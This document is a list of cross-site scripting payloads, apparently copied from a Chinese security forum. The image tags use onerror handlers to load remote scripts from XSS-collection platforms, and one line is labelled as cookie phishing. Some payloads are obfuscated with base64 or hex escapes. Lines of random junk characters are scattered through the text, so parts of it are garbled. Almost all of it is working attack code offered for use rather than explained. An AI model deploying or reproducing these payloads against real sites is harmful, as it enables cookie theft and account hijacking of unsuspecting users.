<img src='non-exist.jpg'onerror="alert('xss')">
9 W' r% U) C5 A' Z+ X- ]<img src=# onerror=alert(123)>8 z B; o; \! H$ P) g# G
<img src=# onerror=alert(document.cookie)>3 \9 z" D. H# G5 K% i B+ s$ r+ D; {
下面是利用平台钓cookie的& U" Q* m) f& k6 t
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";># |1 J C) i' l
; y+ q6 D+ T+ n! ?
. q) q- Y/ c' c8 @$ r: H
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>% C$ @/ t1 j; }7 g+ z- u
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
% c2 A4 p2 u' M3 T“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>+ f$ w v6 S3 A) h. `6 v$ d
<img src=1 onerror=jQuery.getScript("//xss.re/974")> ) v7 x& J. a1 O7 W1 N* E* D
<img src="#">. Y( }: p: K/ A- Z" S
<img src="#">/ V* J w0 L' R% m! r; c
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
+ H w2 r% y' ~ J<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
. ?: w& v" C( Z0 z% V9 q5 H8 a<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
* j3 F- @+ J0 j. `: j: L4 j<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>0 |/ A/ S! v0 {0 f, p7 z
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>* |1 Q5 {* s z S( @& m" \4 l- O/ Y
<img src=x width="0" height="0"></img>
/ z r1 P8 _6 M# b2 K. ?1 n9 ~<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>2 z: l- Y# v) ], p
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
1 b5 T# ^) y% B- { |